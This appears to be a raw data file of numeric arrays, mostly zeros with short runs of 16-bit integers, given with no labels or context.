[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 23684, 13121, 45286, 48646, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 26624, 55808, 59008, 60832, 23144, 28535],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 50052, 19009, 7654, 15110, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 54272, 38144, 11584, 12624, 65236, 3733, 39686],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 10884, 24897, 35558, 47110, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 6144, 34304, 20864, 43104, 40216, 7046, 53121],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 37252, 30785, 63462, 13574, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 44032, 35584, 56000, 20656, 12716, 43403, 21080],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 63620, 36673, 25830, 45574, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 60672, 54080, 11984, 47924, 4539],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 24452, 42561, 53734, 12038, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 50176, 20736, 31808, 19728, 964, 19025, 33690],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 50820, 48449, 16102, 44038, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 51200, 61952, 35968, 24352, 8392, 59634, 45221],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 11652, 54337, 44006, 10502, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 7168, 26368, 29120, 32368, 19228, 13927, 56140],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 38020, 60225, 6374, 42502, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 33024, 47168, 62143],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 64388, 577, 34278, 8966, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 46080, 19712, 6976, 31952, 44468, 59213, 49646],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 25220, 6465, 62182, 40966, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 30720, 40448, 22400, 47584, 28024, 32926, 35465],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 51588, 12353, 24550, 7430, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 33536, 55488, 8240, 8588, 27267, 31744],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 12420, 18241, 52454, 39430, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 17152, 47296, 37936, 48524, 13955],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 38788, 24129, 14822, 5894, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 41984, 35072, 2624, 32912, 27812, 49545, 18946],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 65156, 30017, 42726, 37894, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 10240, 35328, 45696, 30880, 45864, 61066, 24877],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 25988, 35905, 5094, 4358, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 64512, 57088, 4032, 62960, 42236, 16863, 34932],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 52356, 41793, 32998, 36358, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 6144, 34304, 12672, 6240, 30488, 49415],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 13188, 47681, 60902, 2822, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 1280, 18752, 6224, 45204, 62725, 53206],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 39556, 53569, 23270, 34822, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 55296, 46592, 40320, 23392, 8664, 32438, 63633],
